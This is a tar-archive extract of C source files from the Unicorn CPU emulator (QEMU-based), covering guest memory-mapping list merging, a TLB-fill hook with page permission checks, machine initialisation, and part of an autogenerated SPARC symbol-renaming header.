��������������������������unicorn-2.1.1/qemu/softmmu/memory_mapping.c���������������������������������������������������������0000664�0000000�0000000�00000011137�14675241067�0021037�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * QEMU memory mapping * * Copyright Fujitsu, Corp. 2011, 2012 * * Authors: * Wen Congyang <wency@cn.fujitsu.com> * * This work is licensed under the terms of the GNU GPL, version 2 or later. * See the COPYING file in the top-level directory. * */ #include "qemu/osdep.h" #include "cpu.h" #include "sysemu/memory_mapping.h" #include "exec/memory.h" //#define DEBUG_GUEST_PHYS_REGION_ADD static void memory_mapping_list_add_mapping_sorted(MemoryMappingList *list, MemoryMapping *mapping) { MemoryMapping *p; QTAILQ_FOREACH(p, &list->head, next) { if (p->phys_addr >= mapping->phys_addr) { QTAILQ_INSERT_BEFORE(p, mapping, next); return; } } QTAILQ_INSERT_TAIL(&list->head, mapping, next); } static void create_new_memory_mapping(MemoryMappingList *list, hwaddr phys_addr, hwaddr virt_addr, ram_addr_t length) { MemoryMapping *memory_mapping; memory_mapping = g_malloc(sizeof(MemoryMapping)); memory_mapping->phys_addr = phys_addr; memory_mapping->virt_addr = virt_addr; memory_mapping->length = length; list->last_mapping = memory_mapping; list->num++; memory_mapping_list_add_mapping_sorted(list, memory_mapping); } static inline bool mapping_contiguous(MemoryMapping *map, hwaddr phys_addr, hwaddr virt_addr) { return phys_addr == map->phys_addr + map->length && virt_addr == map->virt_addr + map->length; } /* * [map->phys_addr, map->phys_addr + map->length) and * [phys_addr, phys_addr + length) have intersection? */ static inline bool mapping_have_same_region(MemoryMapping *map, hwaddr phys_addr, ram_addr_t length) { return !(phys_addr + length < map->phys_addr || phys_addr >= map->phys_addr + map->length); } /* * [map->phys_addr, map->phys_addr + map->length) and * [phys_addr, phys_addr + length) have intersection. The virtual address in the * intersection are the same? */ static inline bool mapping_conflict(MemoryMapping *map, hwaddr phys_addr, hwaddr virt_addr) { return virt_addr - map->virt_addr != phys_addr - map->phys_addr; } /* * [map->virt_addr, map->virt_addr + map->length) and * [virt_addr, virt_addr + length) have intersection. And the physical address * in the intersection are the same. */ static inline void mapping_merge(MemoryMapping *map, hwaddr virt_addr, ram_addr_t length) { if (virt_addr < map->virt_addr) { map->length += map->virt_addr - virt_addr; map->virt_addr = virt_addr; } if ((virt_addr + length) > (map->virt_addr + map->length)) { map->length = virt_addr + length - map->virt_addr; } } void memory_mapping_list_add_merge_sorted(MemoryMappingList *list, hwaddr phys_addr, hwaddr virt_addr, ram_addr_t length) { MemoryMapping *memory_mapping, *last_mapping; if (QTAILQ_EMPTY(&list->head)) { create_new_memory_mapping(list, phys_addr, virt_addr, length); return; } last_mapping = list->last_mapping; if (last_mapping) { if (mapping_contiguous(last_mapping, phys_addr, virt_addr)) { last_mapping->length += length; return; } } QTAILQ_FOREACH(memory_mapping, &list->head, next) { if (mapping_contiguous(memory_mapping, phys_addr, virt_addr)) { memory_mapping->length += length; list->last_mapping = memory_mapping; return; } if (phys_addr + length < memory_mapping->phys_addr) { /* create a new region before memory_mapping */ break; } if (mapping_have_same_region(memory_mapping, phys_addr, length)) { if (mapping_conflict(memory_mapping, phys_addr, virt_addr)) { continue; } /* merge this region into memory_mapping */ mapping_merge(memory_mapping, virt_addr, length); list->last_mapping = memory_mapping; return; } } /* this region can not be merged into any existed memory mapping. */ create_new_memory_mapping(list, phys_addr, virt_addr, length); } ���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/softmmu/unicorn_vtlb.c�����������������������������������������������������������0000664�0000000�0000000�00000005341�14675241067�0020520�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#include <stdint.h> #include "qemu/osdep.h" #include "qemu-common.h" #include "exec/exec-all.h" #include "uc_priv.h" #include <stdio.h> static void raise_mmu_exception(CPUState *cs, target_ulong address, int rw, uintptr_t retaddr) { cs->uc->invalid_error = UC_ERR_EXCEPTION; cs->uc->invalid_addr = address; cpu_exit(cs->uc->cpu); cpu_loop_exit_restore(cs, retaddr); } static uc_mem_type rw_to_mem_type(int rw) { switch (rw) { case MMU_DATA_LOAD: return UC_MEM_READ; case MMU_DATA_STORE: return UC_MEM_WRITE; case MMU_INST_FETCH: return UC_MEM_FETCH; default: return UC_MEM_READ; } } static int perms_to_prot(int perms) { int ret = 0; if (perms & UC_PROT_READ) { ret |= PAGE_READ; } if (perms & UC_PROT_WRITE) { ret |= PAGE_WRITE; } if (perms & UC_PROT_EXEC) { ret |= PAGE_EXEC; } return ret; } bool unicorn_fill_tlb(CPUState *cs, vaddr address, int size, MMUAccessType rw, int mmu_idx, bool probe, uintptr_t retaddr) { bool handled = false; bool ret = false; struct uc_struct *uc = cs->uc; uc_tlb_entry e; struct hook *hook; HOOK_FOREACH_VAR_DECLARE; HOOK_FOREACH(uc, hook, UC_HOOK_TLB_FILL) { if (hook->to_delete) { continue; } if (!HOOK_BOUND_CHECK(hook, address)) { continue; } handled = true; JIT_CALLBACK_GUARD_VAR(ret, ((uc_cb_tlbevent_t)hook->callback)(uc, address & TARGET_PAGE_MASK, rw_to_mem_type(rw), &e, hook->user_data)); if (ret) { break; } } if (handled && !ret) { goto tlb_miss; } if (!handled) { e.paddr = address & TARGET_PAGE_MASK; switch (rw) { case MMU_DATA_LOAD: e.perms = UC_PROT_READ; break; case MMU_DATA_STORE: e.perms = UC_PROT_WRITE; break; case MMU_INST_FETCH: e.perms = UC_PROT_EXEC; break; default: e.perms = 0; break; } } switch (rw) { case MMU_DATA_LOAD: ret = e.perms & UC_PROT_READ; break; case MMU_DATA_STORE: ret = e.perms & UC_PROT_WRITE; break; case MMU_INST_FETCH: ret = e.perms & UC_PROT_EXEC; break; default: ret = false; break; } if (ret) { tlb_set_page(cs, address & TARGET_PAGE_MASK, e.paddr & TARGET_PAGE_MASK, perms_to_prot(e.perms), mmu_idx, TARGET_PAGE_SIZE); return true; } tlb_miss: if (probe) { return false; } raise_mmu_exception(cs, address, rw, retaddr); return false; } �����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/softmmu/vl.c���������������������������������������������������������������������0000664�0000000�0000000�00000004053�14675241067�0016434�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * QEMU System Emulator * * Copyright (c) 2003-2008 Fabrice Bellard * * Permission is hereby granted, free of charge, to any person obtaining a copy * of this software and associated documentation files (the "Software"), to deal * in the Software without restriction, including without limitation the rights * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell * copies of the Software, and to permit persons to whom the Software is * furnished to do so, subject to the following conditions: * * The above copyright notice and this permission notice shall be included in * all copies or substantial portions of the Software. * * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN * THE SOFTWARE. */ #include "sysemu/sysemu.h" #include "sysemu/cpus.h" #include "uc_priv.h" void init_real_host_page_size(struct uc_struct *uc); void init_cache_info(struct uc_struct *uc); DEFAULT_VISIBILITY int machine_initialize(struct uc_struct *uc) { init_get_clock(); /* Init uc->qemu_real_host_page_size. */ init_real_host_page_size(uc); /* Init uc->qemu_icache_linesize. */ init_cache_info(uc); // Initialize arch specific. uc->init_arch(uc); /* Init memory. */ uc->cpu_exec_init_all(uc); uc->target_page(uc); /* Init tcg. use DEFAULT_CODE_GEN_BUFFER_SIZE. */ uc->tcg_exec_init(uc, uc->tcg_buffer_size); /* Init cpu. use default cpu_model. */ return uc->cpus_init(uc, NULL); } void qemu_system_reset_request(struct uc_struct* uc) { cpu_stop(uc); } void qemu_system_shutdown_request(struct uc_struct *uc) { /* TODO: shutdown(exit program) immediately? */ cpu_stop(uc); } �������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/sparc.h��������������������������������������������������������������������������0000664�0000000�0000000�00000231742�14675241067�0015445�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* Autogen header for Unicorn Engine - DONOT MODIFY */ #ifndef UNICORN_AUTOGEN_sparc_H #define UNICORN_AUTOGEN_sparc_H #ifndef UNICORN_ARCH_POSTFIX #define UNICORN_ARCH_POSTFIX _sparc #endif #define unicorn_fill_tlb unicorn_fill_tlb_sparc #define reg_read reg_read_sparc #define reg_write reg_write_sparc #define uc_init uc_init_sparc #define uc_add_inline_hook uc_add_inline_hook_sparc #define uc_del_inline_hook uc_del_inline_hook_sparc #define tb_invalidate_phys_range tb_invalidate_phys_range_sparc #define use_idiv_instructions use_idiv_instructions_sparc #define arm_arch arm_arch_sparc #define tb_target_set_jmp_target tb_target_set_jmp_target_sparc #define have_bmi1 have_bmi1_sparc #define have_popcnt have_popcnt_sparc #define have_avx1 have_avx1_sparc #define have_avx2 have_avx2_sparc #define have_isa have_isa_sparc #define have_altivec have_altivec_sparc #define have_vsx have_vsx_sparc #define flush_icache_range flush_icache_range_sparc #define s390_facilities s390_facilities_sparc #define tcg_dump_op tcg_dump_op_sparc #define tcg_dump_ops tcg_dump_ops_sparc #define tcg_gen_and_i64 tcg_gen_and_i64_sparc #define tcg_gen_discard_i64 tcg_gen_discard_i64_sparc #define tcg_gen_ld16s_i64 tcg_gen_ld16s_i64_sparc #define tcg_gen_ld16u_i64 tcg_gen_ld16u_i64_sparc #define tcg_gen_ld32s_i64 tcg_gen_ld32s_i64_sparc #define tcg_gen_ld32u_i64 tcg_gen_ld32u_i64_sparc #define tcg_gen_ld8s_i64 tcg_gen_ld8s_i64_sparc #define tcg_gen_ld8u_i64 tcg_gen_ld8u_i64_sparc #define tcg_gen_ld_i64 tcg_gen_ld_i64_sparc #define tcg_gen_mov_i64 tcg_gen_mov_i64_sparc #define tcg_gen_movi_i64 tcg_gen_movi_i64_sparc #define tcg_gen_mul_i64 tcg_gen_mul_i64_sparc #define tcg_gen_or_i64 tcg_gen_or_i64_sparc #define tcg_gen_sar_i64 tcg_gen_sar_i64_sparc #define tcg_gen_shl_i64 tcg_gen_shl_i64_sparc #define tcg_gen_shr_i64 tcg_gen_shr_i64_sparc #define tcg_gen_st_i64 tcg_gen_st_i64_sparc #define tcg_gen_xor_i64 tcg_gen_xor_i64_sparc #define cpu_icount_to_ns cpu_icount_to_ns_sparc #define cpu_is_stopped cpu_is_stopped_sparc #define cpu_get_ticks cpu_get_ticks_sparc #define cpu_get_clock cpu_get_clock_sparc #define cpu_resume cpu_resume_sparc #define qemu_init_vcpu qemu_init_vcpu_sparc #define cpu_stop_current cpu_stop_current_sparc #define resume_all_vcpus resume_all_vcpus_sparc #define vm_start vm_start_sparc #define address_space_dispatch_compact address_space_dispatch_compact_sparc #define flatview_translate flatview_translate_sparc #define address_space_translate_for_iotlb address_space_translate_for_iotlb_sparc #define qemu_get_cpu qemu_get_cpu_sparc #define cpu_address_space_init cpu_address_space_init_sparc #define cpu_get_address_space cpu_get_address_space_sparc #define cpu_exec_unrealizefn cpu_exec_unrealizefn_sparc #define cpu_exec_initfn cpu_exec_initfn_sparc #define cpu_exec_realizefn cpu_exec_realizefn_sparc #define tb_invalidate_phys_addr tb_invalidate_phys_addr_sparc #define cpu_watchpoint_insert cpu_watchpoint_insert_sparc #define cpu_watchpoint_remove_by_ref cpu_watchpoint_remove_by_ref_sparc #define cpu_watchpoint_remove_all cpu_watchpoint_remove_all_sparc #define cpu_watchpoint_address_matches cpu_watchpoint_address_matches_sparc #define cpu_breakpoint_insert cpu_breakpoint_insert_sparc #define cpu_breakpoint_remove cpu_breakpoint_remove_sparc #define cpu_breakpoint_remove_by_ref cpu_breakpoint_remove_by_ref_sparc #define cpu_breakpoint_remove_all cpu_breakpoint_remove_all_sparc #define cpu_abort cpu_abort_sparc #define cpu_physical_memory_test_and_clear_dirty cpu_physical_memory_test_and_clear_dirty_sparc #define memory_region_section_get_iotlb memory_region_section_get_iotlb_sparc #define flatview_add_to_dispatch flatview_add_to_dispatch_sparc #define qemu_ram_get_host_addr qemu_ram_get_host_addr_sparc #define qemu_ram_get_offset qemu_ram_get_offset_sparc #define qemu_ram_get_used_length qemu_ram_get_used_length_sparc #define qemu_ram_is_shared qemu_ram_is_shared_sparc #define qemu_ram_pagesize qemu_ram_pagesize_sparc #define qemu_ram_alloc_from_ptr qemu_ram_alloc_from_ptr_sparc #define qemu_ram_alloc qemu_ram_alloc_sparc #define qemu_ram_free qemu_ram_free_sparc #define qemu_map_ram_ptr qemu_map_ram_ptr_sparc #define qemu_ram_block_host_offset qemu_ram_block_host_offset_sparc #define qemu_ram_block_from_host qemu_ram_block_from_host_sparc #define qemu_ram_addr_from_host qemu_ram_addr_from_host_sparc #define cpu_check_watchpoint cpu_check_watchpoint_sparc #define iotlb_to_section iotlb_to_section_sparc #define address_space_dispatch_new address_space_dispatch_new_sparc #define address_space_dispatch_free address_space_dispatch_free_sparc #define flatview_read_continue flatview_read_continue_sparc #define address_space_read_full address_space_read_full_sparc #define address_space_write address_space_write_sparc #define address_space_rw address_space_rw_sparc #define cpu_physical_memory_rw cpu_physical_memory_rw_sparc #define address_space_write_rom address_space_write_rom_sparc #define cpu_flush_icache_range cpu_flush_icache_range_sparc #define cpu_exec_init_all cpu_exec_init_all_sparc #define address_space_access_valid address_space_access_valid_sparc #define address_space_map address_space_map_sparc #define address_space_unmap address_space_unmap_sparc #define cpu_physical_memory_map cpu_physical_memory_map_sparc #define cpu_physical_memory_unmap cpu_physical_memory_unmap_sparc #define cpu_memory_rw_debug cpu_memory_rw_debug_sparc #define qemu_target_page_size qemu_target_page_size_sparc #define qemu_target_page_bits qemu_target_page_bits_sparc #define qemu_target_page_bits_min qemu_target_page_bits_min_sparc #define target_words_bigendian target_words_bigendian_sparc #define cpu_physical_memory_is_io cpu_physical_memory_is_io_sparc #define ram_block_discard_range ram_block_discard_range_sparc #define ramblock_is_pmem ramblock_is_pmem_sparc #define page_size_init page_size_init_sparc #define set_preferred_target_page_bits set_preferred_target_page_bits_sparc #define finalize_target_page_bits finalize_target_page_bits_sparc #define cpu_outb cpu_outb_sparc #define cpu_outw cpu_outw_sparc #define cpu_outl cpu_outl_sparc #define cpu_inb cpu_inb_sparc #define cpu_inw cpu_inw_sparc #define cpu_inl cpu_inl_sparc #define memory_map memory_map_sparc #define memory_map_io memory_map_io_sparc #define memory_map_ptr memory_map_ptr_sparc #define memory_cow memory_cow_sparc #define memory_unmap memory_unmap_sparc #define memory_moveout memory_moveout_sparc #define memory_movein memory_movein_sparc #define memory_free memory_free_sparc #define flatview_unref flatview_unref_sparc #define address_space_get_flatview address_space_get_flatview_sparc #define memory_region_transaction_begin memory_region_transaction_begin_sparc #define memory_region_transaction_commit memory_region_transaction_commit_sparc #define memory_region_init memory_region_init_sparc #define memory_region_access_valid memory_region_access_valid_sparc #define memory_region_dispatch_read memory_region_dispatch_read_sparc #define memory_region_dispatch_write memory_region_dispatch_write_sparc #define memory_region_init_io memory_region_init_io_sparc #define memory_region_init_ram_ptr memory_region_init_ram_ptr_sparc #define memory_region_size memory_region_size_sparc #define memory_region_set_readonly memory_region_set_readonly_sparc #define memory_region_get_ram_ptr memory_region_get_ram_ptr_sparc #define memory_region_from_host memory_region_from_host_sparc #define memory_region_get_ram_addr memory_region_get_ram_addr_sparc #define memory_region_add_subregion memory_region_add_subregion_sparc #define memory_region_del_subregion memory_region_del_subregion_sparc #define memory_region_add_subregion_overlap memory_region_add_subregion_overlap_sparc #define memory_region_find memory_region_find_sparc #define memory_region_filter_subregions memory_region_filter_subregions_sparc #define memory_listener_register memory_listener_register_sparc #define memory_listener_unregister memory_listener_unregister_sparc #define address_space_remove_listeners address_space_remove_listeners_sparc #define address_space_init address_space_init_sparc #define address_space_destroy address_space_destroy_sparc #define memory_region_init_ram memory_region_init_ram_sparc #define memory_mapping_list_add_merge_sorted memory_mapping_list_add_merge_sorted_sparc #define find_memory_mapping find_memory_mapping_sparc #define exec_inline_op exec_inline_op_sparc #define floatx80_default_nan floatx80_default_nan_sparc #define float_raise float_raise_sparc #define float16_is_quiet_nan float16_is_quiet_nan_sparc #define float16_is_signaling_nan float16_is_signaling_nan_sparc #define float32_is_quiet_nan float32_is_quiet_nan_sparc #define float32_is_signaling_nan float32_is_signaling_nan_sparc #define float64_is_quiet_nan float64_is_quiet_nan_sparc #define float64_is_signaling_nan float64_is_signaling_nan_sparc #define floatx80_is_quiet_nan floatx80_is_quiet_nan_sparc #define floatx80_is_signaling_nan floatx80_is_signaling_nan_sparc #define floatx80_silence_nan floatx80_silence_nan_sparc #define propagateFloatx80NaN propagateFloatx80NaN_sparc #define float128_is_quiet_nan float128_is_quiet_nan_sparc #define float128_is_signaling_nan float128_is_signaling_nan_sparc #define float128_silence_nan float128_silence_nan_sparc #define float16_add float16_add_sparc #define float16_sub float16_sub_sparc #define float32_add float32_add_sparc #define float32_sub float32_sub_sparc #define float64_add float64_add_sparc #define float64_sub float64_sub_sparc #define float16_mul float16_mul_sparc #define float32_mul float32_mul_sparc #define float64_mul float64_mul_sparc #define float16_muladd float16_muladd_sparc #define float32_muladd float32_muladd_sparc #define float64_muladd float64_muladd_sparc #define float16_div float16_div_sparc #define float32_div float32_div_sparc #define float64_div float64_div_sparc #define float16_to_float32 float16_to_float32_sparc #define float16_to_float64 float16_to_float64_sparc #define float32_to_float16 float32_to_float16_sparc #define float32_to_float64 float32_to_float64_sparc #define float64_to_float16 float64_to_float16_sparc #define float64_to_float32 float64_to_float32_sparc #define float16_round_to_int float16_round_to_int_sparc #define float32_round_to_int float32_round_to_int_sparc #define float64_round_to_int float64_round_to_int_sparc #define float16_to_int16_scalbn float16_to_int16_scalbn_sparc #define float16_to_int32_scalbn float16_to_int32_scalbn_sparc #define float16_to_int64_scalbn float16_to_int64_scalbn_sparc #define float32_to_int16_scalbn float32_to_int16_scalbn_sparc #define float32_to_int32_scalbn float32_to_int32_scalbn_sparc #define float32_to_int64_scalbn float32_to_int64_scalbn_sparc #define float64_to_int16_scalbn float64_to_int16_scalbn_sparc #define float64_to_int32_scalbn float64_to_int32_scalbn_sparc #define float64_to_int64_scalbn float64_to_int64_scalbn_sparc #define float16_to_int16 float16_to_int16_sparc #define float16_to_int32 float16_to_int32_sparc #define float16_to_int64 float16_to_int64_sparc #define float32_to_int16 float32_to_int16_sparc #define float32_to_int32 float32_to_int32_sparc #define float32_to_int64 float32_to_int64_sparc #define float64_to_int16 float64_to_int16_sparc #define float64_to_int32 float64_to_int32_sparc #define float64_to_int64 float64_to_int64_sparc #define float16_to_int16_round_to_zero float16_to_int16_round_to_zero_sparc #define float16_to_int32_round_to_zero float16_to_int32_round_to_zero_sparc #define float16_to_int64_round_to_zero float16_to_int64_round_to_zero_sparc #define float32_to_int16_round_to_zero float32_to_int16_round_to_zero_sparc #define float32_to_int32_round_to_zero float32_to_int32_round_to_zero_sparc #define float32_to_int64_round_to_zero float32_to_int64_round_to_zero_sparc #define float64_to_int16_round_to_zero float64_to_int16_round_to_zero_sparc #define float64_to_int32_round_to_zero float64_to_int32_round_to_zero_sparc #define float64_to_int64_round_to_zero float64_to_int64_round_to_zero_sparc #define float16_to_uint16_scalbn float16_to_uint16_scalbn_sparc #define float16_to_uint32_scalbn float16_to_uint32_scalbn_sparc #define float16_to_uint64_scalbn float16_to_uint64_scalbn_sparc #define float32_to_uint16_scalbn float32_to_uint16_scalbn_sparc #define float32_to_uint32_scalbn float32_to_uint32_scalbn_sparc #define float32_to_uint64_scalbn float32_to_uint64_scalbn_sparc #define float64_to_uint16_scalbn float64_to_uint16_scalbn_sparc #define float64_to_uint32_scalbn float64_to_uint32_scalbn_sparc #define float64_to_uint64_scalbn float64_to_uint64_scalbn_sparc #define float16_to_uint16 float16_to_uint16_sparc #define float16_to_uint32 float16_to_uint32_sparc #define float16_to_uint64 float16_to_uint64_sparc #define float32_to_uint16 float32_to_uint16_sparc #define float32_to_uint32 float32_to_uint32_sparc #define float32_to_uint64 float32_to_uint64_sparc #define float64_to_uint16 float64_to_uint16_sparc #define float64_to_uint32 float64_to_uint32_sparc #define float64_to_uint64 float64_to_uint64_sparc #define float16_to_uint16_round_to_zero float16_to_uint16_round_to_zero_sparc #define float16_to_uint32_round_to_zero float16_to_uint32_round_to_zero_sparc #define float16_to_uint64_round_to_zero float16_to_uint64_round_to_zero_sparc #define float32_to_uint16_round_to_zero float32_to_uint16_round_to_zero_sparc #define float32_to_uint32_round_to_zero float32_to_uint32_round_to_zero_sparc #define float32_to_uint64_round_to_zero float32_to_uint64_round_to_zero_sparc #define float64_to_uint16_round_to_zero float64_to_uint16_round_to_zero_sparc #define float64_to_uint32_round_to_zero float64_to_uint32_round_to_zero_sparc #define float64_to_uint64_round_to_zero float64_to_uint64_round_to_zero_sparc #define int64_to_float16_scalbn int64_to_float16_scalbn_sparc #define int32_to_float16_scalbn int32_to_float16_scalbn_sparc #define int16_to_float16_scalbn int16_to_float16_scalbn_sparc #define int64_to_float16 int64_to_float16_sparc #define int32_to_float16 int32_to_float16_sparc #define int16_to_float16 int16_to_float16_sparc #define int64_to_float32_scalbn int64_to_float32_scalbn_sparc #define int32_to_float32_scalbn int32_to_float32_scalbn_sparc #define int16_to_float32_scalbn int16_to_float32_scalbn_sparc #define int64_to_float32 int64_to_float32_sparc #define int32_to_float32 int32_to_float32_sparc #define int16_to_float32 int16_to_float32_sparc #define int64_to_float64_scalbn int64_to_float64_scalbn_sparc #define int32_to_float64_scalbn int32_to_float64_scalbn_sparc #define int16_to_float64_scalbn int16_to_float64_scalbn_sparc #define int64_to_float64 int64_to_float64_sparc #define int32_to_float64 int32_to_float64_sparc #define int16_to_float64 int16_to_float64_sparc #define uint64_to_float16_scalbn uint64_to_float16_scalbn_sparc #define uint32_to_float16_scalbn uint32_to_float16_scalbn_sparc #define uint16_to_float16_scalbn uint16_to_float16_scalbn_sparc #define uint64_to_float16 uint64_to_float16_sparc #define uint32_to_float16 uint32_to_float16_sparc #define uint16_to_float16 uint16_to_float16_sparc #define uint64_to_float32_scalbn uint64_to_float32_scalbn_sparc #define uint32_to_float32_scalbn uint32_to_float32_scalbn_sparc #define uint16_to_float32_scalbn uint16_to_float32_scalbn_sparc #define uint64_to_float32 uint64_to_float32_sparc #define uint32_to_float32 uint32_to_float32_sparc #define uint16_to_float32 uint16_to_float32_sparc #define uint64_to_float64_scalbn uint64_to_float64_scalbn_sparc #define uint32_to_float64_scalbn uint32_to_float64_scalbn_sparc #define uint16_to_float64_scalbn uint16_to_float64_scalbn_sparc #define uint64_to_float64 uint64_to_float64_sparc #define uint32_to_float64 uint32_to_float64_sparc #define uint16_to_float64 uint16_to_float64_sparc #define float16_min float16_min_sparc #define float16_minnum float16_minnum_sparc #define float16_minnummag float16_minnummag_sparc #define float16_max float16_max_sparc #define float16_maxnum float16_maxnum_sparc #define float16_maxnummag float16_maxnummag_sparc #define float32_min float32_min_sparc #define float32_minnum float32_minnum_sparc #define float32_minnummag float32_minnummag_sparc #define float32_max float32_max_sparc #define float32_maxnum float32_maxnum_sparc #define float32_maxnummag float32_maxnummag_sparc #define float64_min float64_min_sparc #define float64_minnum float64_minnum_sparc #define float64_minnummag float64_minnummag_sparc #define float64_max float64_max_sparc #define float64_maxnum float64_maxnum_sparc #define float64_maxnummag float64_maxnummag_sparc #define float16_compare float16_compare_sparc #define float16_compare_quiet float16_compare_quiet_sparc #define float32_compare float32_compare_sparc #define float32_compare_quiet float32_compare_quiet_sparc #define float64_compare float64_compare_sparc #define float64_compare_quiet float64_compare_quiet_sparc #define float16_scalbn float16_scalbn_sparc #define float32_scalbn float32_scalbn_sparc #define float64_scalbn float64_scalbn_sparc #define float16_sqrt float16_sqrt_sparc #define float32_sqrt float32_sqrt_sparc #define float64_sqrt float64_sqrt_sparc #define float16_default_nan float16_default_nan_sparc #define float32_default_nan float32_default_nan_sparc #define float64_default_nan float64_default_nan_sparc #define float128_default_nan float128_default_nan_sparc #define float16_silence_nan float16_silence_nan_sparc #define float32_silence_nan float32_silence_nan_sparc #define float64_silence_nan float64_silence_nan_sparc #define float16_squash_input_denormal float16_squash_input_denormal_sparc #define float32_squash_input_denormal float32_squash_input_denormal_sparc #define float64_squash_input_denormal float64_squash_input_denormal_sparc #define normalizeFloatx80Subnormal normalizeFloatx80Subnormal_sparc #define roundAndPackFloatx80 roundAndPackFloatx80_sparc #define normalizeRoundAndPackFloatx80 normalizeRoundAndPackFloatx80_sparc #define int32_to_floatx80 int32_to_floatx80_sparc #define int32_to_float128 int32_to_float128_sparc #define int64_to_floatx80 int64_to_floatx80_sparc #define int64_to_float128 int64_to_float128_sparc #define uint64_to_float128 uint64_to_float128_sparc #define float32_to_floatx80 float32_to_floatx80_sparc #define float32_to_float128 float32_to_float128_sparc #define float32_rem float32_rem_sparc #define float32_exp2 float32_exp2_sparc #define float32_log2 float32_log2_sparc #define float32_eq float32_eq_sparc #define float32_le float32_le_sparc #define float32_lt float32_lt_sparc #define float32_unordered float32_unordered_sparc #define float32_eq_quiet float32_eq_quiet_sparc #define float32_le_quiet float32_le_quiet_sparc #define float32_lt_quiet float32_lt_quiet_sparc #define float32_unordered_quiet float32_unordered_quiet_sparc #define float64_to_floatx80 float64_to_floatx80_sparc #define float64_to_float128 float64_to_float128_sparc #define float64_rem float64_rem_sparc #define float64_log2 float64_log2_sparc #define float64_eq float64_eq_sparc #define float64_le float64_le_sparc #define float64_lt float64_lt_sparc #define float64_unordered float64_unordered_sparc #define float64_eq_quiet float64_eq_quiet_sparc #define float64_le_quiet float64_le_quiet_sparc #define float64_lt_quiet float64_lt_quiet_sparc #define float64_unordered_quiet float64_unordered_quiet_sparc #define floatx80_to_int32 floatx80_to_int32_sparc #define floatx80_to_int32_round_to_zero floatx80_to_int32_round_to_zero_sparc #define floatx80_to_int64 floatx80_to_int64_sparc #define floatx80_to_int64_round_to_zero floatx80_to_int64_round_to_zero_sparc #define floatx80_to_float32 floatx80_to_float32_sparc #define floatx80_to_float64 floatx80_to_float64_sparc #define floatx80_to_float128 floatx80_to_float128_sparc #define floatx80_round floatx80_round_sparc #define floatx80_round_to_int floatx80_round_to_int_sparc #define floatx80_add floatx80_add_sparc #define floatx80_sub floatx80_sub_sparc #define floatx80_mul floatx80_mul_sparc #define floatx80_div floatx80_div_sparc #define floatx80_rem floatx80_rem_sparc #define floatx80_sqrt floatx80_sqrt_sparc #define floatx80_eq floatx80_eq_sparc #define floatx80_le floatx80_le_sparc #define floatx80_lt floatx80_lt_sparc #define floatx80_unordered floatx80_unordered_sparc #define floatx80_eq_quiet floatx80_eq_quiet_sparc #define floatx80_le_quiet floatx80_le_quiet_sparc #define floatx80_lt_quiet floatx80_lt_quiet_sparc #define floatx80_unordered_quiet floatx80_unordered_quiet_sparc #define float128_to_int32 float128_to_int32_sparc #define float128_to_int32_round_to_zero float128_to_int32_round_to_zero_sparc #define float128_to_int64 float128_to_int64_sparc #define float128_to_int64_round_to_zero float128_to_int64_round_to_zero_sparc #define float128_to_uint64 float128_to_uint64_sparc #define float128_to_uint64_round_to_zero float128_to_uint64_round_to_zero_sparc #define float128_to_uint32_round_to_zero float128_to_uint32_round_to_zero_sparc #define float128_to_uint32 float128_to_uint32_sparc #define float128_to_float32 float128_to_float32_sparc #define float128_to_float64 float128_to_float64_sparc #define float128_to_floatx80 float128_to_floatx80_sparc #define float128_round_to_int float128_round_to_int_sparc #define float128_add float128_add_sparc #define float128_sub float128_sub_sparc #define float128_mul float128_mul_sparc #define float128_div float128_div_sparc #define float128_rem float128_rem_sparc #define float128_sqrt float128_sqrt_sparc #define float128_eq float128_eq_sparc #define float128_le float128_le_sparc #define float128_lt float128_lt_sparc #define float128_unordered float128_unordered_sparc #define float128_eq_quiet float128_eq_quiet_sparc #define float128_le_quiet float128_le_quiet_sparc #define float128_lt_quiet float128_lt_quiet_sparc #define float128_unordered_quiet float128_unordered_quiet_sparc #define floatx80_compare floatx80_compare_sparc #define floatx80_compare_quiet floatx80_compare_quiet_sparc #define float128_compare float128_compare_sparc #define float128_compare_quiet float128_compare_quiet_sparc #define floatx80_scalbn floatx80_scalbn_sparc #define float128_scalbn float128_scalbn_sparc #define softfloat_init softfloat_init_sparc #define tcg_optimize tcg_optimize_sparc #define gen_new_label gen_new_label_sparc #define tcg_can_emit_vec_op tcg_can_emit_vec_op_sparc #define tcg_expand_vec_op tcg_expand_vec_op_sparc #define tcg_register_jit tcg_register_jit_sparc #define tcg_tb_insert tcg_tb_insert_sparc #define tcg_tb_remove tcg_tb_remove_sparc #define tcg_tb_lookup tcg_tb_lookup_sparc #define tcg_tb_foreach tcg_tb_foreach_sparc #define tcg_nb_tbs tcg_nb_tbs_sparc #define tcg_region_reset_all tcg_region_reset_all_sparc #define tcg_region_init tcg_region_init_sparc #define tcg_code_size tcg_code_size_sparc #define tcg_code_capacity tcg_code_capacity_sparc #define tcg_tb_phys_invalidate_count 